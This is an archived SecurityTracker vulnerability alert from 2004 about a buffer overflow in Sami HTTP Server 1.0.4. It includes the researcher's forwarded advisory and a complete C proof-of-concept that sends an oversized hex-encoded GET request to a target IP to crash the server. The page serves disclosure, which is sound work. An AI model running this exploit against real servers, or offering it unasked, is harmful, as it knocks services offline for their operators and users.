Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Sami HTTP Server Buffer Overflow Lets Remote Users Crash the Web Server
|
|
SecurityTracker Alert ID: 1009088
|
|
CVE Reference: CAN-2004-0292
(Links to External Site)
|
Updated: Mar 26 2004
|
Original Entry Date: Feb 17 2004
|
Impact: Denial of service via network, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: SP Research Labs
|
Version(s): 1.0.4
|
Description: badpack3t of SP Research Labs reported a buffer overflow in the Sami HTTP Server. A remote user can cause the web service to crash and may be able to execute arbitrary code.
It is reported that a remote user can send a specially crafted HTTP GET request containing more than 4096 bytes of data to the target
server to cause the web service to crash.
The report indicates that it may be possible to cause the server to execute arbitrary
code.
A demonstration exploit is provided in the Source Message and in the original advisory.
The original advisory is available
at:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746
|
Impact: A remote user can cause the web service to crash.
A remote user may be able to cause arbitrary code to be executed on the target system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.karja.com/samihttp/main.php (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: "badpack3t" <badpack3t@security-protocols.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 17 Feb 2004 01:41:49 -0500 (EST)
From: "badpack3t" <badpack3t@security-protocols.com>
Subject: KarjaSoft Sami HTTP Server 1.0.4 Buffer Overflow
|
------=_20040217014149_87744
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Can you please publish the following advisory on your site?
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746
Thanks,
----------------------------------------
badpack3t
founder
www.security-protocols.com
----------------------------------------
------=_20040217014149_87744
Content-Type: text/plain; name="sp-advisory-x10.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="sp-advisory-x10.txt"
SP Research Labs Advisory x10
-----------------------------------
KarjaSoft Sami HTTP Server 1.0.4 Buffer Overflow
-------------------------------------------------
Vendor Home Page:
http://www.karja.com
Date Released - 2.16.2004
--------------------------------------
Product Description from the vendor:
KarjaSoft's Sami brand of servers strives to provide small and powerful solutions, incorporated into
the Pluging Management System.
Focusing on simple configuration and small size, the Sami products still provide the functionality n
eeded for either company or personal
use. Sami HTTP Server is designed to provide the most useful features of a web server, while still k
eeping the simplicity. With a
few clicks you will be ready to share your files over the web!
--------------------
Buffer Overflow
A specifically crafted HTTP GET request which contains over 4096 bytes of data will cause the HTTP se
rver to crash. It may be possible
to execute arbitrary code. Previous versions may also be affected by this vulnerability. Please se
e the sploit for the HTTP GET
request which causes the crash.
----------
Exploit:
Attached to this advisory is a very code which only causes the HTTP server to crash.
------------------------------
Tested on WindowsXP SP1
------------------------------
Original link to the advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746
peace out,
------------------------------
badpack3t
www.security-protocols.com
------------------------------
/****************************/
PoC to crash the server
/****************************/
http://fux0r.phathookups.com/coding/c++/sp-samihttpddos.c
/* Sami HTTP Server Version 1.0.4
vendor:
http://karja.com
coded and discovered by:
badpack3t <badpack3t@security-protocols.com>
for .:sp research labs:.
www.security-protocols.com
2.13.2004
usage:
sp-samihttpddos <targetip> [targetport] (default is 80)
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
/* entire request */
"\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"
"\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"
"\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"
"\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"
"\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"
"\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"
"\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65"
"\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"
"\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"
"\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"
"\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"
"\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"
"\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"
"\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"
"\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"
"\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"
"\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"
"\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"
"\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"
"\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"
"\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"
"\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"
"\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"
"\x0d\x0a";
int main(int argc, char *argv[])
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("Sami HTTP Server Version 1.0.4 DoS by badpack3t\r\n <badpack3t@security-protocols.c
om>\r\n\r\n", argv[0]);
printf("Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 80;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead y0!\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
------=_20040217014149_87744--
|
|
Go to the Top of This SecurityTracker Archive Page
|
